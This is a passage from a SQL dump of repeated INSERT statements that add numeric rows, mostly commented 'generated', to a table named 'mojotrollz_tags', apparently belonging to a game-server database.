'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13602, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13616, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13616, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13616, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13617, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13617, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13617, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13618, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13618, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13636, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13656, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13676, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13676, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13696, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13697, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13697, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13698, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13699, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13716, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13717, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13718, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13718, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13738, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13739, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13740, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13741, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13742, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13743, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13743, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13756, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13776, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13777, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13777, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13797, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13797, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13797, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13798, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13798, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13798, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13816, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13817, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13836, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13837, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13839, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13839, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13839, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13839, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13839, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13840, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13840, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13841, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13841, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13876, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13876, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13896, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13896, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13916, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13916, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13917, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13936, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13956, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13956, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13956, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13957, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13957, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13957, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13958, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13958, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13958, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13959, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13959, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13959, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13976, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13976, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13976, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13996, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13996, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13996, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14020, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14020, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14020, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14021, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14022, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14022, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14023, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14023, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14024, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14024, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14025, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14025, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14026, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14027, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14028, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14029, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14030, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14031, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14041, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14101, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14121, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14123, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14183, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14185, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14185, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14186, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14186, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14187, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14187, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14188, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14188, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14221, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14221, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14222, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14222, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14223, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14223, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14224, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14224, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14225, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14225, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14226, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14226, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14227, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14227, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14228, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14228, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14229, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14229, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14230, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14230, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14231, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14232, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14233, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14234, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14235, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14236, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14237, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14241, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14261, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14262, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14263, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14264, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14265, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14266, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14266, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14267, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14268, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14268, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14269, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14269, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14270, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14270, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14271, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14271, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14272, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14272, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14273, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14273, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14275, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14275, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14276, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14277, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14278, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14279, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14279, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14280, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14280, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14281, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14281, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14282, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14282, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14282, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14283, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14283, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14284, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14285, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14285, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14301, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 